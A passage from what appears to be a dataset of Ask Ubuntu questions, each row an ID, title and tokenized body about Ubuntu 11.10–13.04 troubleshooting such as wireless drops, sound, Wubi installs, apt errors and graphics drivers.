//ppa.launchpad.net/pmcenery/ppa/ubuntu/dists/quantal/main/binary-i386/packages 404 not found , e : some index files failed to download . they have been ignored , or old ones used instead .
295073	wireless connection keeps dropping with a realtek card ( ubuntu 11.10 )	i am using ubuntu 11.10 . my wireless connections drops 10-20 minutes after i start my computer . it keeps searching for wireless after that but does not find it . the same issue does not occur if i use windows . i tried to use the solutions of wireless connection keeps dropping with an intel 3945abg card but it did not work . for example , i could not find /iwl3945.conf file in /etc/modprobe.d folder . also , the `` sudo iwconfig wlan0 power off '' command did not help me either . here are more details of my network : sudo lshw -c network : pci ( sysfs ) *-network description : wireless interface product : rtl8191sevb wireless lan controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan0 version : 10 serial : f0:7b : cb : a3:99:90 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=rtl8192se driverversion=3.0.0-12-generic firmware=n/a ip=172.31.51.68 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:17 ioport:2000 ( size=256 ) memory : f0600000-f0603fff sudo lsmod | grep iwl : iwl3945 73329 0 iwl_legacy 71499 1 iwl3945 mac80211 272785 2 iwl3945 , iwl_legacy cfg80211 172392 3 iwl3945 , iwl_legacy , mac80211 any suggestion will be very appreciated .
295075	freeipa client on ubuntu .	does anyone have a good guide to get freeipa client installed and running on ubuntu 13.04 ? just so i head off everyone up front , yes i know freeipa-client is a package , yes i know it has the ipa-client-install in it , yes i know the documentation is on freeipa.org . with that said , the package does not install all the packages that are needed , the script barely rarely runs to completion and if it does , it does n't work , and the documents for a manual install just flat out do n't work . this is the 3rd ubuntu machine i have installed it on and not a single one have come online the same way . this third one is a 13.04 machine and its just flat out refusing to work . does anyone have a guide ?
295076	why would the system not respect a routing rule ?	we have the following rule in our /etc/network/interfaces file : up route add -net 224.0.0.0/8 dev eth1 if we run route -vne we see it listed : kernel ip routing table destination gateway genmask flags mss window irtt iface . . . 224.0.0.0 0.0.0.0 255.0.0.0 u 0 0 0 eth1 . . . except today we noticed that it was not listed . we rebooted the machine and it appeared again . can you think of a reason why a routing rule like this would not be honored ? this is a 10.04 machine , fwiw , and we saw no error messages related to eth1 in syslog .
295078	wubi installer hangs on expanding	i downloaded wubi installer for 12.04 lts ( 64-bit ) after deciding to re install ubuntu , but every time i try it freezes on expanding . i have also tried using a bootable usb but after i choose install within windows it restarts and does n't install . is my computer not compatible or am i missing something . p.s . i know there is already questions like this asked but i already exhausted their advice too . envy 6-1040ca , windows 7 64bit specs ( double checked ) : http : //h10010.www1.hp.com/wwpc/ca/en/ho/wf06b/321957-321957-3329744-5269150-5269150-5269347-5284416.html ? dnr=1 log : http : //paste.ubuntu.com/5665675/ edit : i did run chkdsk and no diffrence
295080	/var/log/account/pacct is getting too big , where is ckpacct ( to cicle/gzip it ) ?	i got 2 big files at , /var/log/account , of 350mb each ... , my root is only 10gb ... i read there could have ckpacct to cycle and gzip it , but i cant find it , also no alternative command ? edit : i found that sudo accton off disable the logging but the files remain there , and i guess my next boot it will be activated again ... they seem to are being cycled but who actually does it ? 369114432 may 13 23:23 /var/log/account/pacct 333708160 may 13 12:27 /var/log/account/pacct.0 13681065 may 12 16:21 /var/log/account/pacct.1.gz 3371433 may 11 09:50 /var/log/account/pacct.2.gz 7549333 may 10 07:35 /var/log/account/pacct.3.gz edit : my guess boot scripts does the cycle ... anyway , i created this script , but i dont know what safety implications it may have.. any considerations ? cat > ckpacct.sh # ! /bin/bash if [ [ -n `` $ 1 '' ] ] ; then echo `` there is no parameters and no -- help , read the script and understand what is does , before running it up . '' exit 1 fi if [ [ `` $ user '' ! = `` root '' ] ] ; then echo `` you must be root to run it ... '' exit 1 fi function funcerror ( ) { if ( ( $ 1 ! =0 ) ) ; then exit 1 ; fi } cd /var/log/account ; funcerror $ ? # fast ungrab pacct file accton off ; funcerror $ ? mv -v pacct pacct.0.temp ; funcerror $ ? echo -n |tee pacct ; funcerror $ ? chown -v root : adm pacct ; funcerror $ ? chmod -v o-r pacct ; funcerror $ ? accton on ; funcerror $ ? # compress old 0 gzip -v -- best pacct.0 ; funcerror $ ? # releases also pacct.0 filename mv -v pacct.0.temp pacct.0 ; funcerror $ ? # restore new 0 from temp # change file names upping indexes # mv -v pacct pacct.0 for ( ( i=4 ; i > =0 ; i -- ) ) ; do mv -v pacct. $ i.gz pacct. $ ( ( i+1 ) ) .gz ; funcerror $ ? done rm -v pacct.5.gz ; funcerror $ ? # remove last in the limit
295081	ubuntu 13.04 battery indicator problems	i installed ubuntu 13.04 with no problems but in the last 2 days the power indicator is screwing up . it says charging when i pull the cord out and when i put it in sometimes it says no charging . sometimes it charges and sometimes it doesnt . just today my laptop died wile plugged in . with low screen brightness and no programs open and almost nothing running in the backround . please help
295085	how to unhide the recovery partition in ubuntu that is hidden in windows 7 ?	my recovery drive is hidden in windows 7 , and it is not allowed to assign any drive letter to it from storage management of windows , but the partition is shown in storage management of windows as well as in ubuntu . the partition type is 0x37 . how could i unhide the partition using either ubuntu or windows ?
295092	no sound in ubuntu 12.04 and /dev/dsp does not exist	computer is n't playing audio . i 've checked the hardware volume buttons , pavucontrol , and alsamixer . nothing is muted . i 've added the ppa sudo add-apt-repository ppa : ubuntu-audio-dev . i 've also done killall pulseaudio . however when i try mplayer i get : [ ao oss ] audio_setup : ca n't open audio device /dev/dsp : no such file or directory ( which indeed does not show up with ls ) and no sound comes out . youtube via chromium also makes no sound ; so does vimeo ; so does vlc . $ lspci -v 00:1b.0 audio device : intel corporation n10/ich 7 family high definition audio controller ( rev 02 ) subsystem : lenovo thinkpad t60/r60 series flags : bus master , fast devsel , latency 0 , irq 48 memory at ee400000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : snd_hda_intel kernel modules : snd-hda-intel $ lsmod | grep snd snd_hda_codec_analog 97987 1 snd_hda_intel 33773 2 snd_hda_codec 127706 2 snd_hda_codec_analog , snd_hda_intel snd_hwdep 13668 1 snd_hda_codec snd_pcm 97188 2 snd_hda_intel , snd_hda_codec snd_seq_midi 13324 0 snd_rawmidi 30748 1 snd_seq_midi snd_seq_midi_event 14899 1 snd_seq_midi snd_seq 61896 2 snd_seq_midi , snd_seq_midi_event snd_timer 29990 2 snd_pcm , snd_seq snd_seq_device 14540 3 snd_seq_midi , snd_rawmidi , snd_seq snd 78855 14 snd_hda_codec_analog , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , thinkpad_acpi , snd_rawmidi , snd_seq , snd_timer , snd_seq_device soundcore 15091 1 snd snd_page_alloc 18529 2 snd_hda_intel , snd_pcm $ aplay -l **** list of playback hardware devices **** card 0 : intel [ hda intel ] , device 0 : ad198x analog [ ad198x analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : intel [ hda intel ] , device 1 : ad198x digital [ ad198x digital ] subdevices : 1/1 subdevice # 0 : subdevice # 0 $ cat /proc/asound/cards 0 [ intel ] : hda-intel - hda intel hda intel at 0xee400000 irq 48 29 [ thinkpadec ] : thinkpad ec - thinkpad console audio control thinkpad console audio control at ec reg 0x30 , fw 79ht50ww-1.07 $ pacmd welcome to pulseaudio ! use `` help '' for usage information . > > > list-sinks 1 sink ( s ) available . * index : 0 name : < alsa_output.pci-0000_00_1b.0.analog-stereo > driver : < module-alsa-card.c > flags : hardware hw_mute_ctrl hw_volume_ctrl decibel_volume latency dynamic_latency state : suspended suspend cause : idle priority : 9959 volume : 0 : 63 % 1 : 63 % 0 : -12.00 db 1 : -12.00 db balance 0.00 base volume : 56 % -15.00 db volume steps : 65537 muted : no current latency : 0.00 ms max request : 0 kib max rewind : 0 kib monitor source : 0 sample spec : s16le 2ch 48000hz channel map : front-left , front-right stereo used by : 0 linked by : 1 configured latency : 0.00 ms ; range is 0.50 .. 341.33 ms card : 0 < alsa_card.pci-0000_00_1b.0 > module : 4 properties : alsa.resolution_bits = `` 16 '' device.api = `` alsa '' device.class = `` sound '' alsa.class = `` generic '' alsa.subclass = `` generic-mix '' alsa.name = `` ad198x analog '' alsa.id = `` ad198x analog '' alsa.subdevice = `` 0 '' alsa.subdevice_name = `` subdevice # 0 '' alsa.device = `` 0 '' alsa.card = `` 0 '' alsa.card_name = `` hda intel '' alsa.long_card_name = `` hda intel at 0xee400000 irq 48 '' alsa.driver_name = `` snd_hda_intel '' device.bus_path = `` pci-0000:00:1b.0 '' sysfs.path = `` /devices/pci0000:00/0000:00:1b.0/sound/card0 '' device.bus = `` pci '' device.vendor.id = `` 8086 '' device.vendor.name = `` intel corporation '' device.product.name = `` n10/ich 7 family high definition audio controller '' device.form_factor = `` internal '' device.string = `` front:0 '' device.buffering.buffer_size = `` 65536 '' device.buffering.fragment_size = `` 32768 '' device.access_mode = `` mmap+timer '' device.profile.name = `` analog-stereo '' device.profile.description = `` analog stereo '' device.description = `` built-in audio analog stereo '' alsa.mixer_name = `` analog devices ad1981 '' alsa.components = `` hda:11d41981,17aa2025,00100200 '' module-udev-detect.discovered = `` 1 '' device.icon_name = `` audio-card-pci '' ports : analog-output : analog output ( priority 9900 , available : unknown ) properties : active port : < analog-output > what should i do ?
295094	what ubuntu distribution do i want ?	i am a video gamer . i also want linux , so i came to ubuntu . only one question remains : do i want the `` cutting-edge '' ubuntu 13.04 , supported for 9 months , or the 12.04 `` extended support '' version , supported for 4 years ? or do i want something else entirely ?
295101	ubuntu tweak tool - mouse cursor would not change theme	i tried to change the cursor theme from dmz-white to dmz-black for my laptops . but it does not work for one of my laptop . for that laptop , it does not work no matter i change the cursor theme in - ubuntu tweak tool , - or changing it in gksu gedit /usr/share/icons/default/index.theme , - or changing it in sudo update-alternatives -- config x-cursor-theme what else can be done to change it ? thanks in advance ! ==edit== sorry turns out that my mouse cursor is partially changed ... . in the main content of firefox browser , the cursor is changed to black , however if the cursor is on the launcher / file/edit/view bar , it is still white . how come ? ? ?
295104	why does apt-get deliver outdated developer tools in general ?	i am trying ubuntu recently , and am disappointed to find out that apt-get delivers a lot of outdated daily software . for instance , built-essentials delivered gcc-4.6.3 ( seems that it is updated to 4.6.4 now , but not a week ago ) , which even contained a bug that stopped me from building emacs from source ; i was forced to find a port for gcc-4.7.3 to overcome the bug . emacs delivered emacs-23.4 from january 2012 , which lacked quite a few features that i need . git delivered git-1.7.9.5 from march 2012 , which might be just fine for me since i 'm only an amateur developer ( and a student ) , but using software more than one year old knowing that new versions have been constantly rolling out is always bothering in this era . and so on . while building things as large as gcc-4.8.0 from source is rewarding , building smaller utilities like git by myself is rather annoying since it is updated regularly . so my question is , why is apt-get so slow at delivering essential developer tools ? when i 'm on my mac , macports works very well : for instance , git-1.8.2.3 was delivered two days after it was released . emacs is the up-to-date 24.3 . and there is a port for gcc 4.8 , though i do n't use it . please do n't say something like older software is more stable . sure there are regressions , sometimes . but older software are generally more vulnerable . refer to the bug in gcc-4.6.3 i mentioned above . also , i do n't think hardware limitation is a problem . maybe there are older machines out there , but i ca n't imagine a machine running emacs-23.4 that ca n't run 24.3 . if they 'd like to , they can even maintain older ports . i 'm new to ubuntu , so i 'm really sorry if some of my points are offensive to some people .
295105	refind breaks standby mode on macbook air 5.2	i am dual-booting macbook air 5.2 and ubuntu 13.04 using refind , so far things appears to work except when macbook air goes from sleep mode into standby mode ( dump system state from ram to ssd ) , it will not recover when i open the lid or click on touchpad . specifically , i can see keyboard light on but no output on screen at all , so it 's impossible for me to tell if it has booted into the login screen or not . the only solution appear to force shutdown mba at this point by holding power button some info on mba standby mode
295106	ubuntu 13.04 does n't recognize second 40gb hard drive	i have 2 hdd 320 gb + 40 gb the 320 gb has windows 7 i am trying to install ubuntu 13.04 on the 40 gb but ubuntu 13.04 does n't recognize it when installing but ubuntu 13.04 recognize it when i choose try ubuntu i removed the 320 giga and use only the 40 giga and ubuntu did not recognize it after partitioning the 40 giga with gparted 2partitions the first partition is about 33 giga ext4 the second partition about 5 giga swap still have the same problem when installing ubuntu it can not recognize the 40 giga hd image when installing image when try ubuntu
295108	water cooler fan control with ubuntu 12.04	phenom x4 965 3.4ghz 4gb ram ati radeon hd 6870 1gb water cooler corsair after fresh install of ubuntu 12.04 , my water coller was ever enable and run so fast . i ca n't disable or control it . i try follow this post , but does n't work : how to control fan speed ? when i run sudo pwmconfig , appear that : # pwmconfig revision 5857 ( 2010-08-22 ) this program will search your sensors for pulse width modulation ( pwm ) controls , and test each one to see if it controls a fan on your motherboard . note that many motherboards do not have pwm circuitry installed , even if your sensor chip supports pwm . we will attempt to briefly stop each fan using the pwm controls . the program will attempt to restore each fan to full speed after testing . however , it is ** very important ** that you physically verify that the fans have been to full speed after the program has completed . /usr/sbin/pwmconfig : there are no pwm-capable sensor modules installed and when i run sudo fancontrol , appear that : loading configuration from /etc/fancontrol ... error : ca n't read configuration file
295110	help with scanning issue	how do i set up the lexmark s505 printer so it will scan documents ? it prints fine , but i ca n't get it to scan documents into my computer .
295111	amd switchable graphics : integrated outperforms dedicated	i am running ubuntu 12.10 on a sony vaio e14 laptop . i have a amd switchable gpu radeon hd 7600m / intel hd 4000 card . the amd catalyst 13.4 driver is installed : on integrated ( igpu ) : fglrxinfo display : :0 screen : 0 opengl vendor string : intel open source technology center opengl renderer string : mesa dri intel ( r ) ivybridge mobile opengl version string : 3.0 mesa 9.0.3 on discreet ( dgpu ) : fglrxinfo display : :0 screen : 0 opengl vendor string : advanced micro devices , inc. opengl renderer string : amd radeon hd 7600m series opengl version string : 4.2.12217 compatibility profile context 9.012 when using graphics heavy applications or games , the igpu outperforms the radeon gpu easily . the driver recognizes the card correctly , but somehow it does not deliver the maximal potential of the card . for example for benchmarking purposes , using default settings in team fortress 2 , the dgpu has a unbearably low framerate ( about 8-14 fps ) while the igpu easily gets double of that , using the same settings . i have reached the extent of my knowledge as to what to try . anyone experience something similar ? is there a better way to benchmark the gpus short of installing windows ? any settings i could give a try ? update : running glxgears also shows strange behavior . igpu ( seems normal ) : glxgears 302 frames in 5.0 seconds = 60.328 fps dgpu : glxgears 13048 frames in 5.0 seconds = 2609.597 fps i am fairly certain my card can not do 2600+ fps ! : )
295120	ubuntu 13.04 claims wrong password	so i am trying to open my file manager as root , but when it asks for my password , it says it is incorrect . i am the only user on this system , i am setup as administrator ( confirmed in the `` details '' dialog ) . it is the same password i use to install software , login , etc . it works for everything except opening the file manager as root . i have tried it with nemo , nautilus , & thunar ... all give same result .
295121	how can i configure nano to save every 10 seconds ?	i need to have my nano editor autosave every 10 seconds or some specific time period . how can i achieve this ?
295122	lost transparency in kde after installing fglrx video driver	the transparency of kde panel , kickoff menu & tooltips were gone just after installing the fglrx display driver folder view plasmoid remains transparent ( looks like before ) . kwin animations are functioning fine too . kickoff application menu now fades in , rather than raising up from bottom . i 'm on kubuntu 13.04 any idea , would be appreciated ! thanks !
295123	is there a way to speed up the processing speed , using ubuntu 12.04 ( 32 bit ) ltsp fat client ?	i am currently using ubuntu 12.04 ( 32 bit ) with ltsp fat client . before this set-up , i was using thin client and the processing speed was average . however , after changing it into fat client , the computer 's processing speed remarkably decreased . i am looking for any advice or solutions to this issue . i realized that this set-up is not widely done by ubuntu users so it was quite difficult to get answers just by searching on google . i am hoping someone might have answers to this question .
295126	weird thunderbird uninstall problem	ok . i know there are other posts about uninstalling thunderbird , but my problem is weird . first when try and find thunderbird in the software center to uninstall it it does not show up as installed , but only in the list of available to install . yet i do have it and many other thunderbird files and folders when i do a search in the file system : ok , so i did the old `` sudo apt-get remove -- purge thunderbird -y '' and i got this back : it looks to me that it did n't remove thunderbird etc . and when i searched `` file system '' i got the same result as above ! my question is , why is this weirdness happening , and can i manually grab all of those `` thunderbird '' files and folders and manually trash them safely ? are there any `` thunderbird '' files that might cause problems in any way if i trash them ? ok , i tried using gksu nautilus and got an error message : what does this mean ? be kind , i 'm a novice ! ok , i tried gksu nautilus again and got this warning :
295129	installed google chrome but i can not launch it . it does not appear on dash ?	i am running ubuntu 13.04 64bit and tried to install google chrome on my machine following these command lines . wget https : //dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb sudo dpkg -i google-chrome*.deb ; sudo apt-get -f install the problem is that it says the depackaging an installation was complete but chrome is nowhere to be found . uninstalled it with : sudo apt-get purge google-chrome-stable & & sudo apt-get autoremove and installed it again and it is still not showing . i hope you knowledgeable people can help me , p.s . is it possible that i accidentally downloaded the 32bit version and depkged it ? if so , how can i fix it ? also there is a part that said : dependency problems prevent configuration of google-chrome-stable : google-chrome-stable depends on libudev0 ( > = 147 ) ; however : package libudev0 is not installed .
295131	problem occurred while installing packages	i have just installed ubuntu 11.10. whenever i try to install packages from software center i get message like 'failed to download package file check your internet connection ' but my net was on every time . please suggest me solution to solve this problem .
295133	convert ubuntu 13.04 to mac theme error	i 'm following this tutorial and also this youtube tutorial . on executing this command : sudo apt-get install mac-os-lion-theme mac-os-lion-cursors mac-os-lion-icons i 'm getting this error : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package mac-os-lion-theme e : unable to locate package mac-os-lion-cursors e : unable to locate package mac-os-lion-icons any idea what i 'm doing wrong ?
295134	system dont get updates	i am using ubuntu 12.04 and i do n't get any updates . for more than two weeks , whenever i try to check for updates manually it does n't show any updates in the update manager . then i tried via terminal using apt-get . then these following error messages are shown on the screen : e : could not get lock /var/lib/apt/lists/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock directory /var/lib/apt/lists/ e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? and i could n't see any error symbol in the system tray
295135	cant stop a folder syncing in ubuntu one	it 's from an old computer , when i go into my files and click stop syncing nothing happens possible bug ?
295137	can i have ubuntu , apps , and files on a usb	is it possible to use a usb to contain ubuntu and a lightweight variant ( lubuntu ) along with updates , files , documents , apps , etc ? in other words , can i put everything on a usb so i can open my stuff on any computer ? is that even possible ? if so , how is it done ? would it be fast ? any info on the subject would be appreciated
295148	mouse and touchpad options	the problem the options for mouse and touchpad are combined on one page see image below the pointer speed moves , but does n't change anything and is not saved when i exit , also the two finger scroll is greyed out . also i feel that there should be a lot more options available . equipment sony vaio vgn-ar71e laptop question can anyone advise which drivers to install please .
295151	why os x is 5gb while ubuntu is just 700 mb ?	i dont understand whats in 5gb of os x and windows installation dvds when ubuntu fits on 700mb cd and just works with every hardware ! i am not criticizing i am just curious . i 'm expecting answers like comparing webgl with dirextx or graphics library whatever mac uses and comparision between frameworks used by these oses .
295155	how do i mount .vhd file ?	i 'm using 13.04 raring amd64 and i need to mount a .vhd file on my ubuntu . i 've googled about it and found that virtualbox-fuse package is the answer . but the package was deleted from apt repository . is there any way to install the package w/ 13.04 ? or is there any alternative to virtualbox-fuse ?
295156	flash drive boot issue	i tried to install ubuntu 13.04 onto a flash drive and everything seemed to go smoothly , but after it told me to restart ( and i did ) , it said t insert a boot device ( which should be the flash drive , as i have my other drives removed ) . what should i do to get it to boot ? do i need a bootloader or something of the type ?
295176	problems installing ubuntu 13.04 on windows 8 pc	exception : error executing command > > command=c : \windows\sysnative\bcdedit.exe /set { 59a7630e-b8b3-11e2-b90c-d3fbf29a86ca } device partition=e : > > retval=1 > > stderr=an error has occurred setting the element data . the request is not supported . can anyone tell me what is this error ?
295177	not able to launch ubuntu after upgrade with 12.04 in virtualbox	i am using virtualbox 4.1.2 & installed ubuntu 10.04 . i saved so much data in it . recently i started upgrading it to 12.04 . during the middle of installing 12.04 packages , i shutdown my virtualbox . on next restart it got struck at ubuntu loading page itself . not able to see login page and further process . please help me on how to recover my old files .
295179	normal temperature of dell inspiron n4050	my laptop is dell inspiron n4050 . now i am using jupiter . while using ubuntu it shows the cpu temperature is between 45°c - 65°c . is it okay for my laptop ? mine cpu temperature is between 48°c-55°c most of the time . as i mentioned 45°c is the minimum and 65°c is the maximum . is it okay for my laptop ? what do you say , should i stop worrying ?
295182	ubuntu 13.04 boot stuck at the changing orange & white dots . how can i get it to work ?	i had done a fresh install of ubuntu 13.04 a few days ago as a dual boot with windows . last night since the pc was behaving a bit sluggish i tried to restart ubuntu . the bootup reached the grub loader and stopped because there was no 10 seconds countdown . i used an ubuntu 13.04 liveusb and got access of root & recovered my files . i repaired the boot-loader with this liveusb . now the pc boots windows & even has the 10 seconds countdown . however , when booting into ubuntu 13.04 the boot gets stuck at the moving orange & white dots . these orange dots turn to white & white to orange endlessly . it does not boot further . i need to get to the desktop to use the computer . please help . thanks . p.s . i read similar questions but do not have any problems with the graphics card , which is an integrated intel .
295187	dconf . ca n't see `` unity panel ``	in unity section there are `` lenses '' and `` runner '' only . what should i do to enable `` panel '' ?
295192	error during install of ubuntu . ( wubi 12.04 )	after the check of installation files i get this error : an error occurred : error executing command command=c : \windows\sysnative\bcdedit.exe /set { 148fbf66-bba8-11e2-88b0-bc5ff42bd53b } device partition=g : retval=1 stderr=an error has occurred setting the element data . the request is not supported . stdout= for more information , please see the log file : c : \users\demoon\appdata\local\temp\wubi-13.04-rev279.log information about what im using and doing : hdd info : using a simple volume of my 500gb hdd , its a simple due to the boot system is on the 60gig partition with windows 7. it has 5 partitions total : new volume ( e : ) - 55.60 gb ntfs - healthy windows ( d : ) - 60.07 gb ntfs - healthy ( page file ) new volume ( e : ) - 252.43 gb ntfs - healthy - yes this has the same drive letter as the 55gb volume e , why i dont know . new volume ( g : ) - 97.66 gb ntfs - healthy - this is where i am trying to install ubuntu on . note : i am running windows from my external hdd ( volume c : ) it has only 100gb used of the 750gigs . sys specs : amd phenon ii 4x 3.4ghz 8gb ram ati radeon 4350 hd ati radeon 6750 hd 1x 750gb external hdd 1x 2000gb external hdd 1x 500gb internal hdd ubuntu used : 13.04 ( newest according to your site . any help would be great !
295193	fingerprint reader stopped working lenovo e430	i had fingerprint-gui set up and working nicely , used it for login and authenticating root stuff . now suddenly it stopped working . it does not show the `` enroll your finger '' prompt . i reinstalled fingerprint-gui and it does not recognize my fingerprint reader . it just shows `` no devices found '' . but in the menu underneath it shows `` upek ( 0x147e ) biometric touchstrip / touchstrip fingerprint sensor ( 0x1002 ) `` i do n't understand because until now it was running just fine . ubuntu 12.04 , unity update : works now - probably after an update
295197	problem with installing ubuntu on windows 8	so i have set up the ubuntu installer by installing it onto my memory stick using the usbinstaller . i am then faced with a problem . the ubuntu installer loads up and i start going through it making the relevant choices . i then select 'install ubuntu with windows 8 ' , or whatever the option is , as i still want both operating systems . however , when i click continue , my computer restarts . this therefore means that the installer is loaded again from the usb , it then tries to install again , which means i get to the save position before bam , it restarts again . if it restarts and i remove the memory stick , then windows 8 loads . i really have no idea what to do ? my computer appears to be acting as it should really , i just do n't understand why i have to restart before installing ?
295203	issues opening everything	i recently installed ubuntu 12.04 . i had issues opening skype . i looked at a few tutorials that i found from google searches to no avail . i figured it may just be an issue and went to try and update through `` update manager '' and got this error : an unresolvable problem occurred while initializing the package information . please report this bug against the 'update-manager ' package and include the following error message : 'e : malformed line 7 in source list /etc/apt/sources.list ( dist parse ) ' anything i try to open for the most part involving skype , minecraft , imvu , etc . just comes up saying there is a `` system error '' , and that i should report it . i also tried updating just the ubuntu software center and got this , also get this for skype : jesusllama @ ubuntu : ~ $ sudo apt-get install -- reinstall software-center [ sudo ] password for jesusllama : reading package lists ... done building dependency tree reading state information ... done reinstallation of software-center is not possible , it can not be downloaded . you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : skype : i386 : depends : libasound2 : i386 ( > = 1.0.23 ) but it is not going to be installed depends : libc6 : i386 ( > = 2.3.6-6~ ) but it is not going to be installed depends : libc6 : i386 ( > = 2.7 ) but it is not going to be installed depends : libgcc1 : i386 ( > = 1:4.1.1 ) but it is not going to be installed depends : libqt4-dbus : i386 ( > = 4:4.5.3 ) but it is not going to be installed depends : libqt4-network : i386 ( > = 4:4.8.0 ) but it is not going to be installed depends : libqt4-xml : i386 ( > = 4:4.5.3 ) but it is not going to be installed depends : libqtcore4 : i386 ( > = 4:4.7.0~beta1 ) but it is not going to be installed depends : libqtgui4 : i386 ( > = 4:4.8.0 ) but it is not going to be installed depends : libqtwebkit4 : i386 ( > = 2.2~2011week36 ) but it is not going to be installed depends : libstdc++6 : i386 ( > = 4.6 ) but it is not going to be installed depends : libx11-6 : i386 but it is not going to be installed depends : libxext6 : i386 but it is not going to be installed depends : libxss1 : i386 but it is not going to be installed depends : libxv1 : i386 but it is not going to be installed depends : libssl1.0.0 : i386 but it is not going to be installed recommends : sni-qt : i386 but it is not going to be installed recommends : libasound2-plugins : i386 but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . after trying what someone told me to do after changing whats in my sources.list file i updated ... this is what i got : jesusllama @ ubuntu : ~ $ sudo apt-get update [ sudo ] password for jesusllama : ign http : //archive.ubuntu.com precise inrelease ign http : //archive.ubuntu.com precise-updates inrelease ign http : //security.ubuntu.com precise-security inrelease hit http : //archive.ubuntu.com precise release.gpg get:1 http : //security.ubuntu.com precise-security release.gpg [ 198 b ] get:2 http : //archive.ubuntu.com precise-updates release.gpg [ 198 b ] get:3 http : //security.ubuntu.com precise-security release [ 49.6 kb ] hit http : //archive.ubuntu.com precise release get:4 http : //archive.ubuntu.com precise-updates release [ 49.6 kb ] get:5 http : //security.ubuntu.com precise-security/main amd64 packages [ 254 kb ] hit http : //archive.ubuntu.com precise/main amd64 packages hit http : //archive.ubuntu.com precise/restricted amd64 packages hit http : //archive.ubuntu.com precise/universe amd64 packages hit http : //archive.ubuntu.com precise/multiverse amd64 packages hit http : //archive.ubuntu.com precise/main i386 packages hit http : //archive.ubuntu.com precise/restricted i386 packages hit http : //archive.ubuntu.com precise/universe i386 packages hit http : //archive.ubuntu.com precise/multiverse i386 packages hit http : //archive.ubuntu.com precise/main translationindex hit http : //archive.ubuntu.com precise/multiverse translationindex hit http : //archive.ubuntu.com precise/restricted translationindex hit http : //archive.ubuntu.com precise/universe translationindex get:6 http : //archive.ubuntu.com precise-updates/main amd64 packages [ 609 kb ] get:7 http : //security.ubuntu.com precise-security/restricted amd64 packages [ 4,627 b ] get:8 http : //security.ubuntu.com precise-security/universe amd64 packages [ 72.2 kb ] get:9 http : //security.ubuntu.com precise-security/multiverse amd64 packages [ 2,182 b ] get:10 http : //security.ubuntu.com precise-security/main i386 packages [ 267 kb ] get:11 http : //security.ubuntu.com precise-security/restricted i386 packages [ 4,620 b ] get:12 http : //security.ubuntu.com precise-security/universe i386 packages [ 74.3 kb ] get:13 http : //archive.ubuntu.com precise-updates/restricted amd64 packages [ 10.1 kb ] get:14 http : //archive.ubuntu.com precise-updates/universe amd64 packages [ 200 kb ] get:15 http : //security.ubuntu.com precise-security/multiverse i386 packages [ 2,368 b ] get:16 http : //security.ubuntu.com precise-security/main translationindex [ 74 b ] get:17 http : //security.ubuntu.com precise-security/multiverse translationindex [ 71 b ] get:18 http : //security.ubuntu.com precise-security/restricted translationindex [ 72 b ] get:19 http : //security.ubuntu.com precise-security/universe translationindex [ 73 b ] get:20 http : //archive.ubuntu.com precise-updates/multiverse amd64 packages [ 13.6 kb ] get:21 http : //security.ubuntu.com precise-security/main translation-en [ 122 kb ] get:22 http : //archive.ubuntu.com precise-updates/main i386 packages [ 621 kb ] get:23 http : //security.ubuntu.com precise-security/multiverse translation-en [ 995 b ] get:24 http : //security.ubuntu.com precise-security/restricted translation-en [ 1,253 b ] get:25 http : //security.ubuntu.com precise-security/universe translation-en [ 45.6 kb ] get:26 http : //archive.ubuntu.com precise-updates/restricted i386 packages [ 10.0 kb ] get:27 http : //archive.ubuntu.com precise-updates/universe i386 packages [ 203 kb ] get:28 http : //archive.ubuntu.com precise-updates/multiverse i386 packages [ 13.8 kb ] get:29 http : //archive.ubuntu.com precise-updates/main translationindex [ 3,564 b ] get:30 http : //archive.ubuntu.com precise-updates/multiverse translationindex [ 2,605 b ] get:31 http : //archive.ubuntu.com precise-updates/restricted translationindex [ 2,461 b ] get:32 http : //archive.ubuntu.com precise-updates/universe translationindex [ 2,850 b ] hit http : //archive.ubuntu.com precise/main translation-en hit http : //archive.ubuntu.com precise/multiverse translation-en hit http : //archive.ubuntu.com precise/restricted translation-en hit http : //archive.ubuntu.com precise/universe translation-en get:33 http : //archive.ubuntu.com precise-updates/main translation-en [ 273 kb ] get:34 http : //archive.ubuntu.com precise-updates/multiverse translation-en [ 7,834 b ] get:35 http : //archive.ubuntu.com precise-updates/restricted translation-en [ 2,432 b ] get:36 http : //archive.ubuntu.com precise-updates/universe translation-en [ 117 kb ] fetched 3,044 kb in 5s ( 517 kb/s ) reading package lists ... done jesusllama @ ubuntu : ~ $ sudo dpkg -- configure -a dpkg : dependency problems prevent configuration of skype : i386 : skype : i386 depends on libasound2 ( > = 1.0.23 ) . skype : i386 depends on libc6 ( > = 2.3.6-6~ ) . skype : i386 depends on libc6 ( > = 2.7 ) . skype : i386 depends on libgcc1 ( > = 1:4.1.1 ) . skype : i386 depends on libqt4-dbus ( > = 4:4.5.3 ) . skype : i386 depends on libqt4-network ( > = 4:4.8.0 ) . skype : i386 depends on libqt4-xml ( > = 4:4.5.3 ) . skype : i386 depends on libqtcore4 ( > = 4:4.7.0~beta1 ) . skype : i386 depends on libqtgui4 ( > = 4:4.8.0 ) . skype : i386 depends on libqtwebkit4 ( > = 2.2~2011week36 ) . skype : i386 depends on libstdc++6 ( > = 4.6 ) . skype : i386 depends on libx11-6 . skype : i386 depends on libxext6 . skype : i386 depends on libxss1 . skype : i386 depends on libxv1 . skype : i386 depends on libssl1.0.0 . dpkg : error processing skype : i386 ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : skype : i386 jesusllama @ ubuntu : ~ $
